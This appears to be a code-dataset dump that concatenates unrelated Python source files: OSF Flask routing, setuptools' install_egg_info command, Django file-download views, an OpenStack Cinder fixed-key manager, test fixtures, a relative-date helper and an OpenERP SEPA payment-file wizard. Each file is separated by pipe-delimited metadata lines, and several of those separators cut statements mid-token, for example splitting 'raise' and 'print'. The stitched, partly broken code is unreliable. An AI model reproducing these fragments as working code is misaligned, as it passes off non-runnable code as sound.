'api_v2_url': util.api_v2_url, # URL function for templates
'api_v2_base': util.api_v2_url(''), # Base url used by JS api helper
'sanitize': sanitize,
'js_str': lambda x: x.replace("'", r"\'").replace('"', r'\"'),
'sjson': lambda s: sanitize.safe_json(s),
'webpack_asset': paths.webpack_asset,
'waterbutler_url': settings.WATERBUTLER_URL,
'login_url': cas.get_login_url(request.url, auto=True),
'access_token': session.data.get('auth_user_access_token') or '',
'auth_url': cas.get_login_url(request.url),
'profile_url': cas.get_profile_url(),
}
class OsfWebRenderer(WebRenderer):
"""Render a Mako template with OSF context vars.
:param trust: Optional. If ``False``, markup-safe escaping will be enabled
"""
def __init__(self, *args, **kwargs):
kwargs['data'] = get_globals
super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Use if a view only redirects or raises error
notemplate = OsfWebRenderer('', renderer=render_mako_string)
# Static files (robots.txt, etc.)
def favicon():
return send_from_directory(
settings.STATIC_FOLDER,
'favicon.ico',
mimetype='image/vnd.microsoft.icon'
)
def robots():
"""Serves the robots.txt file."""
# Allow local robots.txt
if os.path.exists(os.path.join(settings.STATIC_FOLDER,
'robots.local.txt')):
robots_file = 'robots.local.txt'
else:
robots_file = 'robots.txt'
return send_from_directory(
settings.STATIC_FOLDER,
robots_file,
mimetype='text/plain'
)
def goodbye():
# Redirect to dashboard if logged in
if _get_current_user():
return redirect(util.web_url_for('dashboard'))
status.push_status_message(language.LOGOUT, 'success')
return {}
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
Rule('/<path:_>', ['get', 'post'], HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string)),
Rule('/api/v1/<path:_>', ['get', 'post'],
HTTPError(http.NOT_FOUND), json_renderer),
])
### GUID ###
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
])
### Base ###
process_rules(app, [
Rule('/dashboard/', 'get', website_views.dashboard, OsfWebRenderer('dashboard.mako')),
Rule('/reproducibility/', 'get',
website_views.reproducibility, OsfWebRenderer('', render_mako_string)),
Rule('/about/', 'get', website_views.redirect_about, json_renderer,),
Rule('/howosfworks/', 'get', website_views.redirect_howosfworks, json_renderer,),
Rule('/faq/', 'get', {}, OsfWebRenderer('public/pages/faq.mako')),
Rule('/getting-started/', 'get', {}, OsfWebRenderer('public/pages/getting_started.mako')),
Rule('/explore/', 'get', {}, OsfWebRenderer('public/explore.mako')),
Rule(['/messages/', '/help/'], 'get', {}, OsfWebRenderer('public/comingsoon.mako')),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako'),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako'),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako'),
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule('/news/', 'get', {}, OsfWebRenderer('public/pages/news.mako')),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer
|
,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_view
|
s.get_addon_user_config,
js
|
ohduran/CrowdFinanceInfographic
|
virtualenv/lib/python3.5/site-packages/setuptools/command/install_egg_info.py
|
Python
|
mit
| 5,027
| 0.001989
|
from distutils import log, dir_util
import os, sys
from setuptools.extern.six.moves import map
from setuptools import Command
from setuptools.archive_util import unpack_archive
import pkg_resources
class install_egg_info(Command):
"""Install an .egg-info directory for the package"""
description = "Install an .egg-info directory for the package"
user_options = [
('install-dir=', 'd', "directory to install to"),
]
def initialize_options(self):
self.install_dir = None
self.install_layout = None
self.prefix_option = None
def finalize_options(self):
self.set_undefined_options('install_lib',
('install_dir', 'install_dir'))
self.set_undefined_options('install',('install_layout','install_layout'))
if sys.hexversion > 0x2060000:
self.set_undefined_options('install',('prefix_option','prefix_option'))
ei_cmd = self.get_finalized_command("egg_info")
basename = pkg_resources.Distribution(
None, None, ei_cmd.egg_name, ei_cmd.egg_version
|
).egg_name() + '.egg-info'
if self.install_layout:
if not self.install_layout.lower() in ['deb']:
rai
|
se DistutilsOptionError("unknown value for --install-layout")
self.install_layout = self.install_layout.lower()
basename = basename.replace('-py%s' % pkg_resources.PY_MAJOR, '')
elif self.prefix_option or 'real_prefix' in sys.__dict__:
# don't modify for virtualenv
pass
else:
basename = basename.replace('-py%s' % pkg_resources.PY_MAJOR, '')
self.source = ei_cmd.egg_info
self.target = os.path.join(self.install_dir, basename)
self.outputs = []
def run(self):
self.run_command('egg_info')
if os.path.isdir(self.target) and not os.path.islink(self.target):
dir_util.remove_tree(self.target, dry_run=self.dry_run)
elif os.path.exists(self.target):
self.execute(os.unlink, (self.target,), "Removing " + self.target)
if not self.dry_run:
pkg_resources.ensure_directory(self.target)
self.execute(
self.copytree, (), "Copying %s to %s" % (self.source, self.target)
)
self.install_namespaces()
def get_outputs(self):
return self.outputs
def copytree(self):
# Copy the .egg-info tree to site-packages
def skimmer(src, dst):
# filter out source-control directories; note that 'src' is always
# a '/'-separated path, regardless of platform. 'dst' is a
# platform-specific path.
for skip in '.svn/', 'CVS/':
if src.startswith(skip) or '/' + skip in src:
return None
if self.install_layout and self.install_layout in ['deb'] and src.startswith('SOURCES.txt'):
log.info("Skipping SOURCES.txt")
return None
self.outputs.append(dst)
log.debug("Copying %s to %s", src, dst)
return dst
unpack_archive(self.source, self.target, skimmer)
def install_namespaces(self):
nsp = self._get_all_ns_packages()
if not nsp:
return
filename, ext = os.path.splitext(self.target)
filename += '-nspkg.pth'
self.outputs.append(filename)
log.info("Installing %s", filename)
lines = map(self._gen_nspkg_line, nsp)
if self.dry_run:
# always generate the lines, even in dry run
list(lines)
return
with open(filename, 'wt') as f:
f.writelines(lines)
_nspkg_tmpl = (
"import sys, types, os",
"p = os.path.join(sys._getframe(1).f_locals['sitedir'], *%(pth)r)",
"ie = os.path.exists(os.path.join(p,'__init__.py'))",
"m = not ie and "
"sys.modules.setdefault(%(pkg)r, types.ModuleType(%(pkg)r))",
"mp = (m or []) and m.__dict__.setdefault('__path__',[])",
"(p not in mp) and mp.append(p)",
)
"lines for the namespace installer"
_nspkg_tmpl_multi = (
'm and setattr(sys.modules[%(parent)r], %(child)r, m)',
)
"additional line(s) when a parent package is indicated"
@classmethod
def _gen_nspkg_line(cls, pkg):
# ensure pkg is not a unicode string under Python 2.7
pkg = str(pkg)
pth = tuple(pkg.split('.'))
tmpl_lines = cls._nspkg_tmpl
parent, sep, child = pkg.rpartition('.')
if parent:
tmpl_lines += cls._nspkg_tmpl_multi
return ';'.join(tmpl_lines) % locals() + '\n'
def _get_all_ns_packages(self):
"""Return sorted list of all package namespaces"""
nsp = set()
for pkg in self.distribution.namespace_packages or []:
pkg = pkg.split('.')
while pkg:
nsp.add('.'.join(pkg))
pkg.pop()
return sorted(nsp)
|
pythonthusiast/Northed
|
main.py
|
Python
|
gpl-3.0
| 49
| 0.020408
|
_
|
_author__ = 'Eko Wibowo'
pr
|
int('Hello Python!')
|
Nekmo/simple-monitor-alert
|
simple_monitor_alert/tests/base.py
|
Python
|
mit
| 3,106
| 0.001932
|
import os
import sys
from configparser import NoSectionError
from simple_monitor_alert.alerts import Alerts
from simple_monitor_alert.lines import Observable, ItemLine
from simple_monitor_alert.monitor import Monitors
from simple_monit
|
or_alert.sma import Results, Config, MonitorsInfo
from simple_monitor_alert.utils.files import JSONFile
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
MONITORS_DIR = os.path.join(BASE_DIR, 'assets', 'monitors')
class FakeJSONFile(JSONFile):
def __init__(self, data):
super(FakeJSONFile, self).__init__('/Fake-JSON-File', create=False)
self.update(data)
def read(self):
pass
def write(self):
|
pass
class FakeObservableResults(FakeJSONFile, Results):
monitor = None
def __init__(self, data=None, sma=None):
data = data or {'monitors': {}}
super(FakeObservableResults, self).__init__(data)
self.sma = sma
def get_observable_result(self, observable):
monitor = self['monitors'].get(getattr(observable, 'monitor', self.monitor), {})
result = monitor.get(observable.name, self.get_default_observable_result())
monitor[observable.name] = result
self['monitors'][getattr(observable, 'monitor', self.monitor)] = monitor
return result
class FakeMonitorsInfo(FakeJSONFile, MonitorsInfo):
pass
class FakeMonitors(Monitors):
pass
class FakeSMA(object):
def __init__(self, config=None, monitors_info=None, monitors_dir=MONITORS_DIR):
self.results = FakeObservableResults()
self.monitors_info = monitors_info or FakeMonitorsInfo({})
self.config = config
self.monitors = FakeMonitors(monitors_dir, sma=self)
class FakeAlert(object):
executions = 0
def __init__(self, section):
self.section = section
def send(self, *args, **kwargs):
self.executions += 1
return True
class FakeConfig(Config):
def __init__(self, data):
if sys.version_info >= (3, 0):
super().__init__('/Fake-Config-File')
else:
# Old Style Class
Config.__init__(self, '/Fake-Config-File')
self._data = data
def items(self, section=None, **kwargs):
try:
return self._data[section]
except KeyError:
raise NoSectionError(section)
class TestBase(object):
def get_observable(self):
observable = Observable('test')
observable.add_line(ItemLine('test.expected', '20'))
observable.add_line(ItemLine('test.value', '19'))
return observable
def get_alerts(self, section, sma):
alerts_modules = [FakeAlert(section)]
alerts = Alerts(sma, '/Fake-Alerts-Dir', alerts_modules, [section])
return alerts
def get_results(self, data=None, monitors_info=None):
return FakeObservableResults(data, FakeSMA(monitors_info=monitors_info).monitors_info)
def get_sma(self, section=None, monitors_info=None):
config = FakeConfig({section: ()})
sma = FakeSMA(config, monitors_info=monitors_info)
return sma
|
asciidisco/plugin.video.netflix
|
resources/test/test_NetflixSession.py
|
Python
|
mit
| 321
| 0.003115
|
# -*- coding: utf-8 -*-
# Module: NetflixSession
# Author: asciidisco
# Created on: 11.1
|
0.2017
# License: MIT https://goo.gl/5bMj3H
"""Tests for the `NetflixSession` module"""
import unittest
import mock
from resources.lib.NetflixSession import NetflixSession
class NetflixSessionTestCase(unittest.Te
|
stCase):
pass
|
neonichu/status-boards
|
relativeDates.py
|
Python
|
mit
| 2,360
| 0.004237
|
import datetime
def ungettext(a,b,count):
if count:
return b
return a
def ugettext(a):
return a
def timesince(d, now=None):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up t
|
o two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" an
|
d "1 year, 5 days" are not.
Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
chunks = (
(60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
(60 * 60 * 24 * 7, lambda n : ungettext('week', 'weeks', n)),
(60 * 60 * 24, lambda n : ungettext('day', 'days', n)),
(60 * 60, lambda n: ungettext('hour', 'hours', n)),
(60, lambda n: ungettext('minute', 'minutes', n))
)
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
if d.tzinfo:
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
# ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u'0 ' + ugettext('minutes')
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
if i + 1 < len(chunks):
# Now get the second item
seconds2, name2 = chunks[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
return s
|
emanuelcovaci/TLT
|
blog/file/views.py
|
Python
|
agpl-3.0
| 2,918
| 0.004455
|
import json
import os
from django.contrib.admin.views.decorators import staff_member_required
from django.db.models import Q
from django.http import HttpResponse, HttpResponseForbidden, Http404
from django.http.respon
|
se import JsonResponse
from django.conf import settings
from django.shortcuts import get_object_or_404, redirect
from django.views.static import serve
from models import Post
from forms import PostFormSet
import blog.settings
def files_filter(request):
return JsonResponse({'results': list(Post.objects.filter(Q(name__contains=request.GET["query"]) |
|
Q(author__first_name__contains=request.GET["query"]) |
Q(author__last_name__contains=request.GET["query"]),
location="articolFiles")
.values('name', 'author','file'))})
@staff_member_required
def add_multiple_files(request):
if request.method == "POST":
formset = PostFormSet(data=request.POST or None, files=request.FILES or None)
if formset.is_valid():
instances = formset.save(commit=False)
for instance in instances:
instance.author = request.user
instance.save()
formset.save_m2m()
return redirect("/admin/file/post/")
else:
response = HttpResponse(json.dumps({"errors": formset.errors}),
content_type='application/json')
response.status_code = 400
return response
else:
return HttpResponseForbidden()
@staff_member_required
def page_preview(request):
if request.method == "GET":
return HttpResponse(
"<head><title>" + "{0}" + '</title><link rel="stylesheet" type="text/css" '
'href="/static/prism/prism.css"><script '
'src="/static/prism/prism.js"></script></head><body>' + "{0}<br>" +
request.user.get_full_name() + "<br>{1}" + "</body>")
else:
return HttpResponseForbidden()
@staff_member_required
def download_interior_file(request, slug):
given_file = get_object_or_404(Post, slug=slug)
path = given_file.file.path
file_path = os.path.join(settings.MEDIA_ROOT, path)
if os.path.exists(file_path):
with open(file_path, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="application/force-download")
response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)
return response
raise Http404
def exterior_files(request, location, path):
if location is not "articolFiles":
return serve(request, os.path.join("documents", location, path), document_root=blog.settings.MEDIA_ROOT)
|
rsms/smisk
|
lib/smisk/mvc/template/filters.py
|
Python
|
mit
| 375
| 0.026667
|
# encoding: utf-8
'''Temp
|
late filters
'''
def j(s):
"""Escape for JavaScript or encode as JSON"""
pass
try:
from cjson import
|
encode as _json
except ImportError:
try:
from minjson import write as _json
except ImportError:
import re
_RE = re.compile(r'(["\'\\])')
def _json(s):
return repr(_RE.sub(r'\\\1', s)).replace('\\\\','\\')
j = _json
|
TUM-LMF/fieldRNN
|
train.py
|
Python
|
mit
| 20,521
| 0.00731
|
import tensorflow as tf
import cPickle as pickle
import rnn_model
import cnn_model
from dataloader import Dataloader
#import psycopg2
import os
import datetime
import numpy as np
import argparse
from util.util import write_status_file, read_status_file, params2name
import sys
"""
This file contains three functions.
main() provides a shell interface for training from CLI
train_{rnn|cnn} are called by main to perform the training on {rnn|cnn}_model Tensorflow Graphs
Dependencies:
Dataloader.py
rnn_model.py
cnn_model.py
"""
def train_rnn(model,
train_dataloader,
test_dataloader,
savedir="save/tmp",
max_epoch=None,
log_every=20,
save_every=100,
pr
|
int_every=5,
init_from=None,
max_ckpts_to_keep=5,
ckpt_every_n_hours=10000,
allow_gpu_mem_growth=True,
gpu_memory_fraction=0.3,
**kwargs):
"""
This function performs the training operation on a tensorflow rnn_model.py model
:param model: rnn_model object containing tensorflow graph
:param train_dataloader: DataLoader object for Training data
:param test_dataloader: DataLoader object for
|
Testing data
:param savedir: directory to store event and save files
:param max_epoch: hard maximum for number of epochs
:param log_every: Frequency of TensorFlow summary recordings
:param save_every: checkpoint save frequency
:param print_every: console log frequency
:param init_from: initialize weights from checkpoint files
:param max_ckpts_to_keep: tf.train.Saver: maximum number of checkpoint files
:param ckpt_every_n_hours: save every n hours
:param allow_gpu_mem_growth:dynamic growth of gpu vram
:param gpu_memory_fraction: hard upper limit for gpu vram
:return: True if success
"""
terminate = False
if not os.path.exists(savedir + "/train"):
os.makedirs(savedir + "/train")
if not os.path.exists(savedir + "/test"):
os.makedirs(savedir + "/test")
# save list of classes
#np.save(os.path.join(savedir, "classes.npy"), train_dataloader.classes)
# dump pickle args for loading
with open(os.path.join(savedir, "args.pkl"), "wb") as f:
pickle.dump(model.args, f)
# dump human readable args
open(os.path.join(savedir, "args.txt"), "w").write(str(model.args))
train_summary_writer = tf.summary.FileWriter(savedir + "/train", graph=tf.get_default_graph())
test_summary_writer = tf.summary.FileWriter(savedir + "/test", graph=tf.get_default_graph())
saver = tf.train.Saver(max_to_keep=max_ckpts_to_keep, keep_checkpoint_every_n_hours=ckpt_every_n_hours)
step = 0
t_last = datetime.datetime.now()
total_cm_train = total_cm_test = np.zeros((model.n_classes, model.n_classes))
config = tf.ConfigProto()
config.gpu_options.allow_growth = allow_gpu_mem_growth
config.gpu_options.per_process_gpu_memory_fraction = gpu_memory_fraction
config.allow_soft_placement = True
config.log_device_placement = False
train_cross_entropy = None
test_cross_entropy = None
eta = None
print("start")
with tf.Session(config=config) as sess:
sess.run([model.init_op])
if init_from is not None:
if os.path.exists(init_from):
try:
ckpt = tf.train.get_checkpoint_state(init_from)
print("restoring model from %s" % ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
step, epoch = read_status_file(init_from)
train_dataloader.epoch = epoch
except:
print "error at {} ignoring".format(init_from)
init_from = None
pass
i = 0
while (train_dataloader.epoch < max_epoch) or terminate:
i += 1
# step as number of features -> invariant to changes in batch size
step += train_dataloader.batch_size
s_db = datetime.datetime.now()
X, y, seq_lengths = train_dataloader.next_batch()
e_db = datetime.datetime.now()
feed = {model.X: X, model.y_: y, model.seq_lengths: seq_lengths}
# training step
_, cm = sess.run([model.train_op, model.confusion_matrix], feed_dict=feed)
#total_cm_train += cm
e_tr = datetime.datetime.now()
dt_db = e_db - s_db
dt_tr = e_tr - e_db
field_per_s = train_dataloader.batch_size / (datetime.datetime.now() - t_last).total_seconds()
# approximate calculation time
approx_calc_time = (((max_epoch * train_dataloader.num_feat) - step) / field_per_s)
eta = datetime.datetime.now() + datetime.timedelta(seconds=approx_calc_time)
t_last = datetime.datetime.now()
if i % print_every == 0:
train_cross_entropy = sess.run(model.cross_entropy, feed_dict=feed)
msg = "Training: Iteration {}, feature {}, epoch {}, batch {}/{}: xentr {:.2f} " \
"(time: db {}ms; train {}ms, {} feat/s, eta: {})".format(
i,
step,
train_dataloader.epoch,
train_dataloader.batch,
train_dataloader.num_batches,
train_cross_entropy,
int(dt_db.total_seconds() * 1000),
int(dt_tr.total_seconds() * 1000),
int(field_per_s),
eta.strftime("%d.%b %H:%M")
)
print(msg)
if i % log_every == 0: # Record summaries and test-set accuracy
# record with train data
summary = sess.run(model.merge_summary_op, feed_dict=feed)
train_summary_writer.add_summary(summary, step)
# record with test data
X, y, seq_lengths = test_dataloader.next_batch()
feed = {model.X: X, model.y_: y, model.seq_lengths: seq_lengths}
test_cross_entropy, summary = sess.run([model.cross_entropy, model.merge_summary_op], feed_dict=feed)
#total_cm_test += cm
test_summary_writer.add_summary(summary, step)
with tf.name_scope('performance'):
# custom summaries
summary = tf.Summary(value=[
tf.Summary.Value(tag="fields_per_sec", simple_value=field_per_s),
tf.Summary.Value(tag="query_time_sec", simple_value=dt_db.total_seconds()),
tf.Summary.Value(tag="train_time_sec", simple_value=dt_tr.total_seconds())
])
train_summary_writer.add_summary(summary, step)
print("writing summary")
if i % save_every == 0:
if not os.path.exists(savedir):
os.makedirs(savedir)
last_checkpoint = os.path.join(savedir, 'model.ckpt')
saver.save(sess, last_checkpoint, global_step=step)
write_status_file(savedir, step, train_dataloader.epoch)
# update task table
if "update_callback" in kwargs.keys() and (train_cross_entropy is not None) and (test_cross_entropy is not None) and (eta is not None):
kwargs["update_callback"](step, train_dataloader.epoch, train_cross_entropy, test_cross_entropy, eta.strftime("%d.%b %H:%M"))
# save very last state
last_checkpoint = os.path.join(savedir, 'model.ckpt')
saver.save(sess, last_checkpoint, global_step=step)
write_status_file(savedir, step, train_dataloader.epoch)
# update task table
if "update_callback" in kwargs.keys() and (train_cross_entropy is not None) and (
test_cross_entropy is not None) and (eta is not None):
kwargs["update_callback"](step, train_dataloader.epoch, train_cross_entropy,
|
Thingee/cinder
|
cinder/keymgr/conf_key_mgr.py
|
Python
|
apache-2.0
| 4,809
| 0
|
# Copyright (c) 2013 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
An implementation of a key manager that reads its key from the project's
configuration options.
This key manager implementation provides limited security, assuming that the
key remains secret. Using the volume encryption feature as an example,
encryption provides protection against a lost or stolen disk, assuming that
the configuration file that contains the key is not stored on the disk.
Encryption also protects the confidentiality of data as it is transmitted via
iSCSI from the compute host to the storage host (again assuming that an
attacker who intercepts the data does not know the secret key).
Because this implementation uses a single, fixed key, it proffers no
protection once that key is compromised. In particular, different volumes
encrypted with a key provided by this key manager actually share the same
encryption key so *any* volume can be decrypted once the fixed key is known.
"""
import array
from oslo.config import cfg
from cinder import exception
from cinder.keymgr import key
from cinder.keymgr import key_mgr
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
key_mgr_opts = [
cfg.StrOpt('fixed_key',
help='Fixed key returned by key manager, specified in hex'),
]
CONF = cfg.CONF
CONF.register_opts(key_mgr_opts, group='keymgr')
LOG = logging.getLogger(__name__)
class ConfKeyManager(key_mgr.KeyManager):
"""Key Manager that supports one key defined by the fixed_key conf option.
This key manager implementation supports all the methods specified by the
key manager interface. This implementation creates a single key in response
to all invocations of create_key. Side effects (e.g., raising exceptions)
for each method are handled as specified by the key manager interface.
"""
def __init__(self):
super(ConfKeyManager, self).__init__()
self.key_id = '00000000-0000-0000-0000-000000000000'
def _generate_key(self, **kwargs):
_hex = self._generate_hex_key(**kwargs)
return key.SymmetricKey('AES',
array.array('B', _hex.decode('hex')).tolist())
def _generate_hex_key(self, **kwargs):
if CONF.keymgr.fixed_key is None:
LOG.warn(_('config option keymgr.fixed_k
|
ey has not been defined: '
'some operations may fail unexpectedly'))
raise ValueError(_('keymgr.fixed_key not defined'))
return CONF.keymgr.fixed_key
def create_key(self, ctxt, **kwargs):
"""Creates a key.
|
This implementation returns a UUID for the created key. A
NotAuthorized exception is raised if the specified context is None.
"""
if ctxt is None:
raise exception.NotAuthorized()
return self.key_id
def store_key(self, ctxt, key, **kwargs):
"""Stores (i.e., registers) a key with the key manager."""
if ctxt is None:
raise exception.NotAuthorized()
if key != self._generate_key():
raise exception.KeyManagerError(
reason="cannot store arbitrary keys")
return self.key_id
def copy_key(self, ctxt, key_id, **kwargs):
if ctxt is None:
raise exception.NotAuthorized()
return self.key_id
def get_key(self, ctxt, key_id, **kwargs):
"""Retrieves the key identified by the specified id.
This implementation returns the key that is associated with the
specified UUID. A NotAuthorized exception is raised if the specified
context is None; a KeyError is raised if the UUID is invalid.
"""
if ctxt is None:
raise exception.NotAuthorized()
if key_id != self.key_id:
raise KeyError(key_id)
return self._generate_key()
def delete_key(self, ctxt, key_id, **kwargs):
if ctxt is None:
raise exception.NotAuthorized()
if key_id != self.key_id:
raise exception.KeyManagerError(
reason="cannot delete non-existent key")
LOG.warn(_("Not deleting key %s"), key_id)
|
Saruus/drPencilcode
|
app/models.py
|
Python
|
agpl-3.0
| 1,482
| 0.010121
|
from django.db import models
# Models of drScratch
class File(models.Model):
filename = models.CharField(max_length=100)
method = models.CharField(max_length=100)
time = models.TextField()
score = models.CharField(max_length=10)
move = models.CharField(max_length=100)
art = models.CharField(max_length=100)
text = models.CharField(max_length=100)
sound = models.CharField(max_length=100)
control = models.CharField(max_length=100)
operators = models.CharField(max_length=100)
bonus = models.CharField(max_length=1000)
class Dashboard(models.Model):
user = models.TextField()
frelease = models.DateField()
class Activity(models.Model):
text = models.TextField()
date = models.DateField()
class Survey(model
|
s.Model):
name = models.CharField(max_length=200)
user = models.CharField(max_length=100)
date = models.TextField()
question1a = models.CharField(max_length=10)
question1b = models.CharField(max_length=10)
question2a = models.CharField(max_length=10)
question2b = models.CharField(max_length=10)
question2c = models.CharField(max_length=10)
question2d = models.CharField(max_length=200)
question3a = m
|
odels.CharField(max_length=100)
question3b = models.CharField(max_length=10)
question3c = models.CharField(max_length=10)
question4 = models.CharField(max_length=10)
question5 = models.CharField(max_length=10)
question6 = models.CharField(max_length=500)
|
iLampard/alphaware
|
alphaware/preprocess/standardizer.py
|
Python
|
apache-2.0
| 996
| 0.00502
|
# -*- coding: utf-8 -*-
from sklearn
|
.preprocessing import StandardScaler
from sklearn_pandas import DataFrameMapper
from ..base import FactorTransformer
from ..e
|
nums import FactorType
class FactorStandardizer(FactorTransformer):
def __init__(self, copy=True, out_container=False, with_mean=True, with_std=True):
super(FactorStandardizer, self).__init__(copy=copy, out_container=out_container)
self.with_mean = with_mean
self.with_std = with_std
def _build_mapper(self, factor_container):
data = factor_container.data
data_mapper = [([factor_name], self._get_mapper(factor_container.property[factor_name]['type']))
for factor_name in data.columns]
return DataFrameMapper(data_mapper)
def _get_mapper(self, factor_type):
if factor_type == FactorType.INDUSTY_CODE:
return None
else:
return StandardScaler(copy=self.copy, with_mean=self.with_mean, with_std=self.with_std)
|
cernops/CloudMan
|
export/urls.py
|
Python
|
apache-2.0
| 602
| 0.016611
|
from django.conf.urls.defaults import *
from piston.resource import Resource
from handlers import AllocationByTopHandler,AllocationByProjectHandler
import settings
alloc_by_top = Resource(AllocationByTopHandler)
alloc_by_project = Resource(AllocationByProjectHandler)
urlpatterns = patterns('',
url(r'^allocationbytop$
|
', alloc_by_top , { 'emitter_format': 'xml' }),
url(r'^allocationbytop(\.(?P<emitter_format>.+))$', alloc_by_top),
url(r'^allocationbyproject$', alloc_by_project,{ 'emitter_format': 'xml' } ),
url(r'^allocationbyproject(\.(?P<emitter_format>.+))$', all
|
oc_by_project),
)
|
tafaRU/l10n-switzerland
|
__unported__/l10n_ch_sepa/wizard/wiz_pain_001.py
|
Python
|
agpl-3.0
| 4,378
| 0
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011 Camptocamp SA (http://www.camptocamp.com)
# All Right Reserved
#
# Author : Yannick Vaucher (Camptocamp)
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import base64
from openerp.osv import orm, fields
from l10n_ch_sepa.base_sepa.msg_sepa import MsgSEPAFactory
|
class WizardPain001(orm.TransientModel):
_name = "wizard.pain001"
_columns = {
'pain_001_file': fields.binary('XML File', readonly=True)
}
def _get_country_cod
|
e(self, payment):
''' return the coutry code or None
from the bank defined in a payment order'''
if payment.mode.bank_id.bank.country:
return payment.mode.bank_id.bank.country.code
elif payment.user_id.company_id.partner_id.country:
return payment.user_id.company_id.partner_id.country.code
return None
def _get_pain_def(self, country_code):
''' Get the right message definition based on country code
of selected company bank (via payment mode)
if no country is defined, take the company country
- Here we could add a second level for bank definitions'''
if country_code:
class_name = 'pain.001' + '.' + country_code.lower()
if MsgSEPAFactory.has_instance(class_name):
return MsgSEPAFactory.get_instance(class_name)
return MsgSEPAFactory.get_instance('pain.001')
def _create_attachment(self, cr, uid, data, context=None):
''' Create an attachment using data provided
data needed are :
- model : type of object to attach to
- id : id of object model
- base64_data
'''
attachment_obj = self.pool.get('ir.attachment')
vals = {
'name': 'pain001_%s' % time.strftime("%Y-%m-%d_%H:%M:%S",
time.gmtime()),
'datas': data['base64_data'],
'datas_fname': 'pain001_%s.xml' % time.strftime(
"%Y-%m-%d_%H:%M:%S",
time.gmtime()),
'res_model': data['model'],
'res_id': data['id'],
}
attachment_obj.create(cr, uid, vals, context=context)
def create_pain_001(self, cr, uid, ids, context=None):
''' create a pain 001 file into wizard and add it as an attachment '''
payment_obj = self.pool.get('payment.order')
if context is None:
context = {}
if isinstance(ids, list):
wiz_id = ids[0]
else:
wiz_id = ids
current = self.browse(cr, uid, wiz_id, context=context)
pay_id = context.get('active_id', [])
payment = payment_obj.browse(cr, uid, pay_id, context=context)
cc = self._get_country_code(payment)
pain = self._get_pain_def(cc)
pain_001 = pain.compute_export(cr, uid, pay_id, context=context)
pain_001_file = base64.encodestring(pain_001.encode('utf-8'))
data = {'base64_data': pain_001_file, 'id': pay_id}
